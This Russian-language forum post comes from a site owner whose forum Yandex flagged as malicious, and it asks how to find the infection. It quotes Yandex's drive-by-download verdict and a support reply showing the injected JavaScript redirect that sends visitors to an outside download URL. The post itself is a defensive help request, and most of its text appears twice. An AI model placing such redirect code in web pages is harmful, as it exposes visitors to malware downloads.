Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.
Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"
А именно:
Поведенческий анализ
Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.
Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.
Написал вопрос в саппорт, ответ был следующим:
На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:
document.location='http://filestore321.com/download.php?id=6de46215'
Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.
В общем я в тупике и не понимаю в какую сторону мне рыть.
Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.
Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.
Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.
Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.
Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"
А именно:
Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.
Написал вопрос в саппорт, ответ был следующим:
Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.
В общем я в тупике и не понимаю в какую сторону мне рыть.
Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.
Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.
Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.